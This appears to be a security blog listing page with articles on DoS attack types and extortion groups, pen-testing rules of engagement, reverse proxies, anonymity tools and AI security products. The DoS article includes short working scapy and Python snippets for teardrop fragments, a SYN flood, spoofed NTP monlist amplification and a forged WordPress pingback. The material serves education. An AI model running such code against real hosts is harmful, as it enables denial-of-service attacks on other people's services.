
Tech Guides - Security

59 Articles

The 10 most common types of DoS attacks you need to know

Savia Lobo
05 Jun 2018
11 min read
There are businesses that are highly dependent on the services they host online, and it's important that their servers stay up and running smoothly during business hours. Stock markets and casinos are examples of such institutions: they deal with huge sums of money, and they expect their servers to work properly during their core business hours. Hackers may extort money by threatening to take down or block these servers during those hours. The denial of service (DoS) attack is the most common method used to carry out these kinds of attacks. In this post, we will get to know DoS attacks and their various types.

This article is an excerpt taken from the book 'Preventing Ransomware', written by Abhijit Mohanta, Mounir Hahad, and Kumaraguru Velmurugan. In this book, you will learn how to respond quickly to ransomware attacks to protect yourself.

What are DoS attacks?
DoS is one of the oldest forms of cyber extortion attack. As the term indicates, a denial of service attack denies a service to its legitimate users. If a railway website is brought down, it fails to serve the people who want to book tickets. Let's take a peek into some of the details. A DoS attack can happen in two ways:

Specially crafted data: If specially crafted data is sent to the victim and the victim is not set up to handle it, there is a chance that the victim may crash. This does not involve sending too much data; it involves sending specially crafted data packets that the victim fails to handle. This can involve manipulating fields in network protocol packets, exploiting servers, and so on. The ping of death and teardrop attacks are examples of such attacks.
Flooding: Sending too much data to the victim can also slow it down, so that it spends its resources consuming the attacker's data and fails to serve legitimate requests. UDP flooding and SYN flooding are examples of such attacks. Attacks can also use a combination of both techniques.

There is another form of DoS attack called a distributed denial of service (DDoS) attack. A DoS attack uses a single computer to carry out the attack, whereas a DDoS attack uses a series of computers, so packets reach the victim from many machines at once. Sometimes the target server is flooded with so much data that it can't handle it; another way is to exploit the internal workings of protocols. A DDoS attack that deals with extortion is often termed a ransom DDoS. We will now talk about the various types of DoS attacks that might occur.

Teardrop attacks or IP fragmentation attacks
In this type of attack, the hacker sends a specially crafted packet to the victim. To understand this, one must have some knowledge of the TCP/IP protocol suite. In order to transmit data across networks, large IP packets are broken down into smaller ones. This is called fragmentation. When the fragments finally reach their destination, they are reassembled to recover the original data. In the process of fragmentation, some fields are added to the fragmented packets so that they can be tracked at the destination while reassembling. In a teardrop attack, the attacker crafts packets whose fragments overlap with each other. Consequently, the operating system at the destination gets confused about how to reassemble the packets, and it crashes.
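To make the mechanics concrete, here is a minimal sketch of overlapping IP fragments built with the Python scapy library. This is not from the book; the target address is a placeholder, and crafting raw packets like this requires root privileges and should only ever be aimed at lab machines you own:

```python
from scapy.all import IP, UDP, Raw, send

target = "192.0.2.10"  # placeholder lab address (TEST-NET)

# First fragment: offset 0, "more fragments" flag set, 32 bytes of payload
frag1 = IP(dst=target, id=1337, flags="MF", frag=0) / UDP(sport=4444, dport=4444) / Raw(b"A" * 32)

# Second fragment: frag is counted in 8-byte units, so frag=2 means byte
# offset 16, which overlaps the first fragment instead of continuing it
frag2 = IP(dst=target, id=1337, flags=0, frag=2) / Raw(b"B" * 32)

send([frag1, frag2], verbose=False)
```

A patched modern kernel simply discards such overlapping fragments; the teardrop crash only affected old, unpatched reassembly code.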
User Datagram Protocol flooding
User Datagram Protocol (UDP) is an unreliable protocol: the sender of the data does not check whether the receiver has received it. In UDP flooding, many UDP packets are sent to the victim on random ports. When the victim gets a packet on a port, it looks for an application that is listening on that port. When it does not find one, it replies with an Internet Control Message Protocol (ICMP) packet; ICMP packets are used to send error messages. When a lot of UDP packets are received, the victim consumes a lot of resources replying with ICMP packets, which can prevent it from responding to legitimate requests.

SYN flood
TCP is a reliable protocol: it makes sure that the data sent by the sender is completely received by the receiver. To start communication between the sender and receiver, TCP follows a three-way handshake, where SYN denotes the synchronization packet and ACK stands for acknowledgment: the sender starts by sending a SYN packet, the receiver replies with SYN-ACK, and the sender sends back an ACK packet followed by the data. In SYN flooding, the sender is the attacker and the receiver is the victim. The attacker sends a SYN packet and the server responds with SYN-ACK, but the attacker never replies with the final ACK. The server waits for the ACK for some time before giving up. The attacker sends a lot of SYN packets, and the server waits for each final ACK until timeout, exhausting its resources on half-open connections. This kind of attack is called SYN flooding.
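As an illustration, a SYN flood is only a few lines of scapy. This sketch is not from the book, the address is a placeholder, and it must only be used against systems you are authorized to test:

```python
from scapy.all import IP, TCP, RandShort, send

victim = "192.0.2.10"  # placeholder lab address

# Each SYN from a random source port opens a half-connection that the
# server must keep in its backlog until the handshake times out
syn = IP(dst=victim) / TCP(sport=RandShort(), dport=80, flags="S")
send(syn, count=1000, verbose=False)
```

Defenses such as SYN cookies exist precisely because the server otherwise commits state for every half-open connection.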
Ping of death
While transmitting data over the internet, the data is broken into smaller chunks of packets, and the receiving end reassembles these packets to derive the original data. In a ping of death attack, the attacker sends a packet larger than 65,535 bytes, the maximum packet size allowed by the IP protocol. The packet is split into fragments and sent across the internet, but when the fragments are reassembled at the receiving end, the operating system is clueless about how to handle the oversized result, so it crashes.

Exploits
Exploits against servers can also cause a DoS condition. A lot of web applications are hosted on web servers, such as Apache and Tomcat. If there is a vulnerability in one of these web servers, the attacker can launch an exploit against it. The exploit need not take control of the machine; it only has to crash the web server software, which causes a DoS. If the server has default configurations, there are easy ways for hackers to find out which web server and version is running, look up the known vulnerabilities and exploits for it, and, if the web server is not patched, bring it down by sending an exploit.

Botnets
Botnets can be used to carry out DDoS attacks. A botnet herd is a collection of compromised computers. The compromised computers, called bots, act on commands from a command-and-control (C&C) server. On the C&C server's command, these bots can send a huge amount of data to the victim server, overloading it.

Reflective DDoS attacks and amplification attacks
In this kind of attack, the attacker uses legitimate computers to launch an attack against the victim while hiding its own IP address. The usual way is for the attacker to send a small packet to a legitimate machine after forging the packet's sender so that it looks as if it has been sent by the victim. The legitimate machine then sends its response to the victim, and if the response data is large, the impact is amplified. We can call these legitimate computers reflectors, and this kind of attack, where the attacker sends small data and the victim receives a much larger amount of data, is called an amplification attack. Since the attacker does not directly use computers controlled by him and instead uses legitimate computers, it's called a reflective DDoS attack. Unlike the bots in a botnet, the reflectors are not compromised machines; they are simply machines that respond to a particular kind of request, such as a DNS request or a Network Time Protocol (NTP) request. DNS amplification attacks, WordPress pingback attacks, and NTP attacks are all amplification attacks. In a DNS amplification attack, the attacker sends a forged packet to a DNS server containing the IP address of the victim, and the DNS server replies to the victim instead, with larger data. Other kinds of amplification attacks involve SMTP, SSDP, and so on. We will look at an example of such an attack in the next section.

There are several groups of cyber criminals responsible for carrying out ransom DDoS attacks, such as DD4BC, Armada Collective, Fancy Bear, XMR-Squad, and Lizard Squad. These groups target enterprises. They will first send out an extortion email, followed by an attack if the victim does not pay the ransom.

DD4BC
The DD4BC group was first seen operating in 2014. It charged Bitcoins as its extortion fee and mainly targeted the media, entertainment, and financial services industries. The group would send a threatening email stating that a low-intensity DoS attack would be carried out first. They would claim that they could protect the organization against larger attacks, and they also threatened to publish information about the attack on social media to bring down the reputation of the company.

DD4BC is known to exploit the WordPress pingback vulnerability; we won't go into too much detail about the bug itself. Pingback is a feature provided by WordPress through which the original author of a WordPress site or blog gets notified when another site links to or references it. We can call the site that refers to the original site the referrer. If the referrer links to the original, it sends the original a request, called a pingback request, containing its own URL. This is a notification to the original site from the referrer, informing it of the link. As per the protocol designed by WordPress, the original site then downloads the referrer's page in response to the pingback request; this action is termed a reflection, and the WordPress sites used this way in an attack are called reflectors. An attacker can misuse this by creating a forged pingback request containing the URL of a victim site and sending it to many WordPress sites. Put simply, the attacker notifies the WordPress sites that the victim has referred to them on its site, so all the WordPress sites try to connect back to the victim, which overloads it. If the victim's web page is large and all the WordPress sites try to download it, the victim's bandwidth is choked; this is the amplification.
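For illustration, a single forged pingback is just an XML-RPC call to a WordPress site's xmlrpc.php endpoint; in the attack, the "source" URL is the victim's page, which the reflector then fetches. A minimal sketch in Python (all hostnames are placeholders, shown only to clarify the mechanics):

```python
import requests

# pingback.ping(sourceURI, targetURI): the reflector fetches sourceURI
# to verify the link, so a forged sourceURI makes it hit the victim
xml = """<?xml version="1.0"?>
<methodCall>
  <methodName>pingback.ping</methodName>
  <params>
    <param><value><string>http://victim.example/large-page</string></value></param>
    <param><value><string>http://wordpress-reflector.example/?p=1</string></value></param>
  </params>
</methodCall>"""

requests.post("http://wordpress-reflector.example/xmlrpc.php",
              data=xml, headers={"Content-Type": "text/xml"}, timeout=10)
```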
Armada Collective
The Armada Collective group was first seen in 2015. They attacked various financial services and web hosting sites in Russia, Switzerland, Greece, and Thailand, and they re-emerged in Central Europe in October 2017. They used to carry out a demo DDoS attack to threaten the victim before sending an extortion letter.

This group is known to carry out reflective DDoS attacks through NTP. NTP is a protocol used to synchronize computer clocks across a network, and it supports a monlist command for administrative purposes. When an administrator sends the monlist command to an NTP server, the server responds with a list of the last 600 hosts that connected to that server. The attacker can exploit this by creating a forged NTP packet containing a monlist command, with the source IP address set to that of the victim, and sending multiple copies of it to NTP servers. Each NTP server thinks the monlist request has come from the victim's address and sends it a response listing up to 600 computers connected to that server. Thus the victim receives far more data than the attacker ever sent, and it can crash.
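A sketch of the forged query with scapy (not from the book; the first four bytes are the classic mode 7 monlist probe, and the addresses are placeholders):

```python
from scapy.all import IP, UDP, Raw, send

victim = "192.0.2.10"         # placeholder: spoofed source address
ntp_server = "198.51.100.20"  # placeholder: vulnerable NTP server

# NTP mode 7 private packet: implementation 3 (XNTPD), request code 42 (MON_GETLIST_1)
monlist = b"\x17\x00\x03\x2a" + b"\x00" * 4

send(IP(src=victim, dst=ntp_server) / UDP(sport=123, dport=123) / Raw(monlist),
     verbose=False)
```

Modern NTP builds disable monlist entirely, which is why this particular amplification vector has largely died out.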
Fancy Bear
Fancy Bear is one of the hacker groups we have known about since 2010. Fancy Bear threatened to use the Mirai botnet in its attacks. Mirai was known to target the Linux operating systems used in IoT devices and mostly infected CCTV cameras.

We have talked about a few groups that were infamous for carrying out DoS extortion and some of the techniques they used, and we have explored the different types of DoS attacks and how they can occur. If you've enjoyed this excerpt, check out 'Preventing Ransomware' to learn in detail about the latest ransomware attacks involving WannaCry, Petya, and BadRabbit.

Anatomy of a Crypto Ransomware
Barracuda announces Cloud-Delivered Web Application Firewall service
Top 5 penetration testing tools for ethical hackers

5 pen testing rules of engagement: What to consider while performing penetration testing

Fatema Patrawala
14 May 2018
7 min read
Penetration testing and ethical hacking are proactive ways of testing web applications by performing attacks that are similar to a real attack that could occur on any given day. They are executed in a controlled way, with the objective of finding as many security flaws as possible and providing feedback on how to mitigate the risks posed by those flaws. Security-conscious corporations have integrated penetration testing, vulnerability assessments, and source code reviews into their software development cycle, so that when they release a new application, it has already been through various stages of testing and remediation. When planning to execute a penetration testing project, be it for a client as a professional penetration tester or as part of a company's internal security team, there are aspects that always need to be considered before starting the engagement.

This article is an excerpt from the book Web Penetration Testing with Kali Linux - Third Edition, written by Gilberto Najera-Gutierrez and Juned Ahmed Ansari.

Rules of Engagement for pen testing
The Rules of Engagement (RoE) is a document that deals with the manner in which the penetration test is to be conducted. Some of the directives that should be clearly spelled out in the RoE before you start the penetration test are as follows:

The type and scope of testing
Client contact details
Client IT team notifications
Sensitive data handling
Status meetings and reports

Type and scope of penetration testing
The type of testing can be black box, white box, or an intermediate gray box, depending on how the engagement is performed and the amount of information shared with the testing team. There are things that can and cannot be done in each type of testing. With black box testing, the testing team works from the point of view of an attacker who is external to the organization: the penetration tester starts from scratch and tries to identify the network map, the defense mechanisms implemented, the internet-facing websites and services, and so on. Even though this approach may be more realistic in simulating an external attacker, you need to consider that such information may be easily gathered from public sources, or that the attacker may be a disgruntled employee or ex-employee who already possesses it. Thus, it may be a waste of time and money to take a black box approach if, for example, the target is an internal application meant to be used by employees only. White box testing is where the testing team is provided with all of the available information about the targets, sometimes even including the source code of the applications, so that little or no time is spent on reconnaissance and scanning. A gray box test is when partial information, such as the URLs of applications, user-level documentation, and/or user accounts, is provided to the testing team. Gray box testing is especially useful when testing web applications, as the main objective is to find vulnerabilities within the application itself, not in the hosting server or network. Penetration testers can work with user accounts to adopt the point of view of a malicious user, or of an attacker who gained access through social engineering.
[box type="note" align="" class="" width=""]When deciding on the scope of testing, the client along with the testing team need to evaluate what information is valuable and necessary to be protected, and based on that, determine which applications/networks need to be tested and with what degree of access to the information.[/box] Client contact details We can agree that even when we take all of the necessary precautions when conducting tests, at times the testing can go wrong because it involves making computers do nasty stuff. Having the right contact information on the client-side really helps. A penetration test is often seen turning into a Denial-of-Service (DoS) attack. The technical team on the client side should be available 24/7 in case a computer goes down and a hard reset is needed to bring it back online. [box type="note" align="" class="" width=""]Penetration testing web applications has the advantage that it can be done in an environment that has been specially built for that purpose, allowing the testers to reduce the risk of negatively affecting the client's productive assets.[/box] Client IT team notifications Penetration tests are also used as a means to check the readiness of the support staff in responding to incidents and intrusion attempts. You should discuss this with the client whether it is an announced or unannounced test. If it's an announced test, make sure that you inform the client of the time and date, as well as the source IP addresses from where the testing (attack) will be done, in order to avoid any real intrusion attempts being missed by their IT security team. If it's an unannounced test, discuss with the client what will happen if the test is blocked by an automated system or network administrator. Does the test end there, or do you continue testing? It all depends on the aim of the test, whether it's conducted to test the security of the infrastructure or to check the response of the network security and incident handling team. Even if you are conducting an unannounced test, make sure that someone in the escalation matrix knows about the time and date of the test. Web application penetration tests are usually announced. Sensitive data handling During test preparation and execution, the testing team will be provided with and may also find sensitive information about the company, the system, and/or its users. Sensitive data handling needs special attention in the RoE and proper storage and communication measures should be taken (for example, full disk encryption on the testers' computers, encrypting reports if they are sent by email, and so on). If your client is covered under the various regulatory laws such as the Health Insurance Portability and Accountability Act (HIPAA), the Gramm-Leach-Bliley Act (GLBA), or the European data privacy laws, only authorized personnel should be able to view personal user data. Status meeting and reports Communication is key for a successful penetration test. Regular meetings should be scheduled between the testing team and the client organization and routine status reports issued by the testing team. The testing team should present how far they have reached and what vulnerabilities have been found up to that point. The client organization should also confirm whether their detection systems have triggered any alerts resulting from the penetration attempt. If a web server is being tested and a WAF was deployed, it should have logged and blocked attack attempts. 
Status meetings and reports
Communication is key to a successful penetration test. Regular meetings should be scheduled between the testing team and the client organization, and routine status reports should be issued by the testing team. The testing team should present how far they have got and what vulnerabilities have been found up to that point. The client organization should in turn confirm whether their detection systems have triggered any alerts resulting from the penetration attempts; if a web server is being tested and a WAF has been deployed, for example, it should have logged and blocked the attack attempts. As a best practice, the testing team should also document the times at which the tests were conducted. This will help the security team correlate their logs with the penetration tests.

WAFs work by analyzing the HTTP/HTTPS traffic between clients and servers, and they are capable of detecting and blocking the most common attacks on web applications.

To build defenses against web attacks with Kali Linux and understand the concepts of hacking and penetration testing, check out the book Web Penetration Testing with Kali Linux - Third Edition.
Top 5 penetration testing tools for ethical hackers
Essential skills required for penetration testing
Approaching a Penetration Test Using Metasploit


6 common use cases of Reverse Proxy scenarios

Guest Contributor
05 Oct 2018
6 min read
Proxy servers are used as intermediaries between a client and a website or online service. By routing traffic through a proxy server, users can disguise their geographic location and their IP address. Reverse proxies, in particular, can be configured to provide a greater level of control and abstraction, thereby ensuring that the flow of traffic between clients and servers remains smooth. This makes them a popular tool for individuals who want to stay hidden online, but they are also widely used in enterprise settings, where they can improve security, allow tasks to be carried out anonymously, and control the way employees use the internet.

What is a Reverse Proxy?
A reverse proxy server is a type of proxy server that usually sits behind the firewall of a private network and directs client requests to the appropriate server on the backend. Reverse proxies are also used as a means of caching common content and compressing inbound and outbound data, resulting in a faster and smoother flow of traffic between clients and servers. Furthermore, a reverse proxy can handle other tasks, such as SSL encryption, further reducing the load on the web servers. There is a multitude of scenarios and use cases in which having a reverse proxy can make all the difference to the speed and security of your corporate network. By providing a point at which you can inspect traffic and route it to the appropriate server, or even transform the request, a reverse proxy can be used to achieve a variety of goals.

Load balancing to route incoming HTTP requests
This is probably the most familiar use of reverse proxies for many users. Load balancing involves configuring the proxy server to route incoming HTTP requests to a set of identical servers. By spreading incoming requests across these servers, the reverse proxy balances the load, sharing it among them equally. The most common scenario in which load balancing is employed is a website that requires multiple servers, because the volume of requests is too much for one server to handle efficiently. By balancing the load across multiple servers, you also move away from an architecture with a single point of failure. Usually, the servers will all be hosting the same content, but there are also situations in which the reverse proxy retrieves specific information from one of a number of different servers.
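To illustrate the core routing idea, here is a minimal round-robin reverse proxy sketch using only Python's standard library. The backend addresses are hypothetical, and a real deployment would use a hardened server such as nginx or HAProxy rather than this toy:

```python
import itertools
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer
from urllib.request import urlopen

# Hypothetical pool of identical backend app servers
BACKENDS = itertools.cycle(["http://127.0.0.1:8001", "http://127.0.0.1:8002"])

class ProxyHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        backend = next(BACKENDS)  # round-robin: each request goes to the next server
        with urlopen(backend + self.path) as upstream:
            body = upstream.read()
        self.send_response(upstream.status)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

if __name__ == "__main__":
    ThreadingHTTPServer(("0.0.0.0", 8080), ProxyHandler).serve_forever()
```

Clients only ever see port 8080; which backend actually served the request is invisible to them, which is exactly the abstraction described above.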
Provide security by monitoring and logging traffic
By acting as the mediator between clients and your system's backend, a reverse proxy server can hide the overall structure of your backend servers, because it captures any requests that would otherwise go to those servers and handles them securely. A reverse proxy can also improve security by providing businesses with a point at which they can monitor and log traffic flowing through their network. A common use case in which a reverse proxy bolsters the security of a network is acting as an SSL gateway. This allows you to communicate using plain HTTP behind the firewall without compromising your security, and it saves you the trouble of having to configure security for each server behind the firewall individually.

A rotating residential proxy, also known as a backconnect proxy, is a type of proxy that frequently changes the IP addresses and connections that the user appears to come from. This allows users to hide their identity and generate a large number of requests without setting off alarms. A reverse rotating residential proxy can be used to improve the security of a corporate network or website, because the servers in question will display the information of the proxy server while keeping their own information hidden from potential attackers.

No need to install certificates on your backend servers with SSL termination
SSL termination occurs when an SSL connection ends at the proxy, and the traffic shifts between encrypted and unencrypted requests. By using a reverse proxy to handle incoming HTTPS connections, you can have the proxy server decrypt each request and then pass the unencrypted request on to the appropriate server. Taking this approach offers practical benefits: it eliminates the need to install certificates on your backend servers, and it provides a single configuration point for managing SSL/TLS. Removing the need for your web servers to perform this decryption also reduces their processing load.

Serve static content on behalf of backend servers
Some reverse proxy servers can be configured to also act as web servers. Websites contain a mixture of dynamic content, which changes over time, and static content, which always remains the same. If you configure your reverse proxy server to serve static content on behalf of the backend servers, you can greatly reduce their load, freeing up more power for rendering dynamic content. Alternatively, a reverse proxy can be configured to behave like a cache, storing and serving frequently requested content and thereby further reducing the load on the backend servers.

URL rewriting before requests go on to the backend servers
Anything a business can easily do to improve its SEO score is worth considering. Without an investment in your SEO, your business or website will remain invisible to search engine users. With URL rewriting, you can compensate for any legacy systems you use that produce URLs that are less than ideal for SEO: with a reverse proxy server, the URLs can be automatically reformatted before they are passed on to the backend servers.

Combine different websites into a single URL space
It is often desirable for a business to adopt a distributed architecture in which different functions are handled by different components. With a reverse proxy, it is easy to route a single URL space to a multitude of components. To anyone who uses your URL, it simply appears as if they are moving to another page on the website; in fact, each page within that URL space might be served by a completely different backend service. This approach is widely used for web service APIs.

To sum up, the primary function of a reverse proxy is load balancing: ensuring that no individual backend server becomes inundated with more traffic or requests than it can handle. However, there are a number of other scenarios in which a reverse proxy can potentially offer enormous benefits.

About the author
Harold Kilpatrick is a cybersecurity consultant and a freelance blogger. He's currently working on a cybersecurity campaign to raise awareness around the threats that businesses can face online.

Read Next
HAProxy introduces stick tables for server persistence, threat detection, and collecting metrics
How to Configure Squid Proxy Server
Acting as a proxy (HttpProxyModule)


10 great tools to stay completely anonymous online

Guest Contributor
12 Jul 2018
8 min read
Everybody is facing a battle these days. Though it may not be immediately apparent, it is already affecting a majority of the global population. This battle is not fought with bombs, planes, or tanks, or with any physical weapons for that matter. This battle is for our online privacy.

A survey made last year discovered that 69% of data breaches were related to identity theft, and another shows that the number of data breaches related to identity theft has steadily risen over the last four years worldwide. It is likely to keep increasing as hackers gain easy access to ever more advanced tools. The EU's GDPR may curb this trend by imposing stricter data protection standards on data controllers and processors. These entities have been collecting and storing our data for years through ads that track our online habits: another reason to protect our online anonymity. However, this new regulation has only been in force for just over a month, and only within the EU, so it's going to take some time before we feel its long-term effects. The question is, what should we do when hackers try to steal and maliciously use our personal information? Simple: we defend ourselves with the tools at our disposal to stay completely anonymous online. So, here's a list you may find useful.

1. VPNs
A VPN helps you maintain anonymity by hiding your real IP and internet activity from prying eyes. Normally, your browser sends a query tagged with your IP every time you make an online search. Your ISP takes this query and sends it to a DNS server, which then points you to the correct website. Of course, your ISP (and all the servers your query had to go through) can, and likely will, view and monitor all the data you pass through them, including your personal information and IP address. This allows them to keep a tab on all your internet activity. A VPN protects your identity by assigning you an anonymous IP and encrypting your data. This means that any query you send to your ISP will be encrypted and will no longer display your real IP, which is why using a VPN is one of the best ways to stay anonymous online. However, not all VPNs are created equal: you have to choose the best one if you want airtight security. Also, beware of free VPNs; most of them make money by selling your data to advertisers. You'll want to compare and contrast several VPNs to find the best one for you, but that's easier said than done with so many different VPNs out there. Look for reviews on trustworthy sites to find the best VPN for your needs.

2. TOR Browser
The Onion Router (TOR) is a browser that strengthens your online anonymity even further by using different layers of encryption, thereby protecting your internet activity, which includes "visits to Web sites, online posts, instant messages, and other communication forms". It works by first encasing your data in three layers of encryption. Your data is then bounced three times, each bounce taking off one layer of encryption. Once your data gets to the right server, it "puts back on" each layer it has shed as it successively bounces back to your device. You can even improve TOR by using it in combination with a compatible VPN. It is important to note, though, that using TOR won't hide the fact that you're using it, and some sites may restrict connections made through TOR.

3. Virtual machine
A virtual machine is basically a second computer within your computer. It lets you emulate another device through an application, and the emulated computer can then be set up according to your preferences.
The best use for this tool, however, is for tasks that don't involve an internet connection: for example, when you want to open a file and make sure no one is watching over your shoulder. After opening the file, you simply delete the virtual machine. You can try VirtualBox, which is available on Windows, Linux, and Mac.

4. Proxy servers
A proxy server is an intermediary between your device and the internet. It's basically another computer that you use to process internet requests; it's similar to a virtual machine in concept, but it's an entirely separate physical machine. It protects your anonymity in a similar way to a VPN (by hiding your IP), but it can also send a different user agent to keep your browser unidentifiable, and it can block or accept cookies while keeping them from passing to your device. Most VPN companies also offer proxy servers, so they're a good place to look for a reliable one.

5. Fake emails
A fake email is exactly what the name suggests: an email that isn't linked to your real identity. Fake emails aid your online anonymity not only by hiding your real identity but by keeping you safe from phishing emails or malware, which can easily be sent to you via email. Making a fake email can be as easy as signing up for an email account without using your real information, or by using a fake email service.

6. Incognito mode
"Going incognito" is the easiest anonymity tool to come by. Your device will not store any data at all while in this mode, including your browsing history, cookies, site data, and information entered in forms. Most browsers have a privacy mode that you can easily use to hide your online activity from other users of the same device.

7. Ad blockers
Ads are everywhere these days. Advertising has always been, and always will be, a lucrative business. That said, there is a difference between good ads and bad ads. Good ads target a population as a whole; bad ads (interest-based advertising, as their companies like to call it) target each of us individually by tracking our online activity and location, which compromises our online privacy. Tracking algorithms aren't illegal, though, and have even been considered "clever". But the worst ads are those that contain malware that can infect your device and prevent you from using it. You can use ad blockers to combat these threats to your anonymity and security. Ad blockers usually come in the form of browser extensions, which work instantly with no additional configuration needed. For Google Chrome, you can choose Adblock Plus, uBlock Origin, or AdBlock; for Opera, you can choose Opera Ad Blocker, Adblock Plus, or uBlock Origin.

8. Secure messaging apps
If you need to use an online messaging app, you should know that the popular ones aren't as secure as you'd like them to be. True, Facebook Messenger does have a "secret conversation" feature, but Facebook hasn't exactly been the most secure social network to begin with. Instead, use tools like Signal or Telegram. These apps use end-to-end encryption and can even be used to make voice calls.

9. File shredder
The right to be forgotten has surfaced in mainstream media with the onset of the EU's General Data Protection Regulation. This right basically requires data-collecting or data-processing entities to completely remove a data subject's PII from their records. You can practice this same right on your own device by using a "file shredding" tool. The thing is, completely removing sensitive files from your device is hard. Simply deleting a file and emptying your device's recycle bin doesn't actually remove it; your device just treats the space it filled up as empty and available. These "dead" files can still haunt you when they are found by someone who knows where to look. You can use software like Dr. Cleaner (for Mac) or Eraser (for Windows) to "shred" your sensitive files by overwriting them several times with random patterns of random sets of data.
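The idea behind shredding is simple enough to sketch in a few lines of Python (a toy illustration, not one of the tools above; note that journaling filesystems and SSD wear-leveling can keep copies of the old blocks, so a dedicated tool is still the safer choice):

```python
import os
import secrets

def shred(path, passes=3):
    """Overwrite a file with random bytes several times, then delete it."""
    size = os.path.getsize(path)
    with open(path, "r+b") as f:
        for _ in range(passes):
            f.seek(0)
            f.write(secrets.token_bytes(size))  # fresh random pattern each pass
            f.flush()
            os.fsync(f.fileno())  # force the overwrite to physical storage
    os.remove(path)

shred("old-tax-return.pdf")  # placeholder file name
```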
10. DuckDuckGo
DuckDuckGo is a search engine that doesn't track your behaviour (unlike Google and Bing, which use behavioural trackers to target you with ads). It emphasizes your privacy and avoids the filter bubble of personalized search results. It offers useful features like region-specific searching, Safe Search (to protect against explicit content), and an instant-answer feature which shows an answer across the top of the screen, apart from the search results.

To sum it up: our online privacy is being attacked from all sides. Ads legally track our online activities, and hackers steal our personal information. The GDPR may help in the long run, but that remains to be seen. What's important is what we do now, and these tools will set you on the path to a more secure and private internet experience today.

About the Author
Dana Jackson is a U.S. expat living in Germany and the founder of PrivacyHub. She loves all things related to security and privacy. She holds a degree in Political Science and loves to call herself a scientist. Dana also loves morning coffee and her dog Paw.

Top 5 cybersecurity trends you should be aware of in 2018
Twitter allegedly deleted 70 million fake accounts in an attempt to curb fake news
Top 5 cybersecurity myths debunked


6 artificial intelligence cybersecurity tools you need to know

Savia Lobo
25 Aug 2018
7 min read
Recently, organizations have been confronted by DeepLocker, a new breed of malware that secretly evades even stringent cybersecurity mechanisms. DeepLocker leverages an AI model to attack its target host using indicators such as facial recognition, geolocation, and voice recognition. This speaks volumes about the big role AI plays in the cybersecurity domain; in fact, some may even go on to say that AI for cybersecurity is no longer a nice-to-have but a necessity. Large and small organizations, and even startups, are investing heavily in building AI systems to analyze huge data troves and, in turn, help their cybersecurity professionals identify possible threats and take precautions or immediate action to resolve them. If AI can be used to protect systems, it can also be used to harm them: hackers and intruders can use it to launch much smarter attacks, which would be far more difficult to combat. Phishing, one of the simplest and most common social engineering cyber attacks, is now easy for attackers to master, and there is a plethora of tools on the dark web that can help anyone get their hands on phishing. In such trying conditions, it is only imperative that organizations take the necessary precautions to guard their information castles. What better than AI?

How 6 tools are using artificial intelligence for cybersecurity

Symantec's Targeted Attack Analytics (TAA) tool
This tool was developed by Symantec and is used to uncover stealthy and targeted attacks. It applies AI and machine learning to the processes, knowledge, and capabilities of Symantec's security experts and researchers. The TAA tool was used by Symantec to counter the Dragonfly 2.0 attack last year, which targeted multiple energy companies and tried to gain access to operational networks. Eric Chien, Technical Director of Symantec Security, says: "With TAA, we're taking the intelligence generated from our leading research teams and uniting it with the power of advanced machine learning to help customers automatically identify these dangerous threats and take action." The TAA tool analyzes incidents within the network against the incidents found in Symantec's threat data lake, unveils suspicious activity on individual endpoints, and collates that information to determine whether each action indicates hidden malicious activity. The TAA tools are now available for Symantec Advanced Threat Protection (ATP) customers.

Sophos' Intercept X tool
Sophos is a British security software and hardware company. Its tool, Intercept X, uses a deep learning neural network that works similarly to a human brain. In 2010, the US Defense Advanced Research Projects Agency (DARPA) created its first Cyber Genome Program to uncover the 'DNA' of malware and other cyber threats, which led to the creation of the algorithm present in Intercept X. Before a file executes, Intercept X is able to extract millions of features from it, conduct a deep analysis, and determine whether the file is benign or malicious, all in 20 milliseconds. The model is trained on real-world feedback and on bi-directional sharing of threat intelligence via access to millions of samples provided by data scientists. This results in a high accuracy rate for both existing and zero-day malware, and a lower false positive rate. Intercept X utilizes behavioral analysis to restrict new ransomware and boot-record attacks.
Intercept X has been tested by several third parties, such as NSS Labs, and received high scores. It has also been proven on VirusTotal since August of 2016. Maik Morgenstern, CTO of AV-TEST, said: "One of the best performance scores we have ever seen in our tests."

Darktrace Antigena
Darktrace Antigena is Darktrace's active self-defense product. Antigena expands Darktrace's core capabilities by replicating the function of digital antibodies that identify and neutralize threats and viruses. Antigena makes use of Darktrace's Enterprise Immune System to identify suspicious activity and responds to it in real time, depending on the severity of the threat. With the help of the underlying machine learning technology, Darktrace Antigena identifies and protects against unknown threats as they develop, without the need for human intervention, prior knowledge of attacks, rules, or signatures. With such automated response capability, organizations can respond to threats quickly, without disrupting the normal pattern of business activity. Darktrace Antigena modules help regulate user and machine access to the internet, message protocols, and machine and network connectivity via products such as Antigena Internet, Antigena Communication, and Antigena Network.

IBM QRadar Advisor
IBM's QRadar Advisor uses IBM Watson technology to fight cyber attacks. It uses AI to auto-investigate indicators of any compromise or exploit, and it applies cognitive reasoning to give critical insights and further accelerate the response cycle. With the help of IBM's QRadar Advisor, security analysts can assess threat incidents and reduce the risk of missing them. Features of IBM QRadar Advisor include:

Automatic investigation of incidents: QRadar Advisor with Watson investigates threat incidents by mining local data, using observables in the incident to gather broader local context. It then quickly assesses whether the threats have bypassed the layered defenses or were blocked.
Intelligent reasoning: QRadar identifies the likely threat by applying cognitive reasoning. It connects threat entities related to the original incident, such as malicious files, suspicious IP addresses, and rogue entities, to draw relationships among them.
Identification of high-priority risks: With this tool, one can get critical insights on an incident, such as whether or not a malware has executed, with supporting evidence, so you can focus your time on the higher-risk threats and decide quickly on the best response method for your business.
Key insights on users and critical assets: IBM's QRadar can detect suspicious behavior from insiders through integration with the User Behavior Analytics (UBA) app, and it understands how certain activities or profiles impact systems.

Vectra's Cognito
Vectra's Cognito platform uses AI to detect attackers in real time. It automates threat detection and hunts for covert attackers. Cognito uses behavioral detection algorithms to collect network metadata, logs, and cloud events; it then analyzes these events and stores them to reveal hidden attackers in workloads and user/IoT devices. The Cognito platform consists of Cognito Detect and Cognito Recall. Cognito Detect reveals hidden attackers in real time using machine learning, data science, and behavioral analytics, and it automatically triggers responses from existing security enforcement points by driving dynamic incident response rules. Cognito Recall determines exploits that exist in historical data.
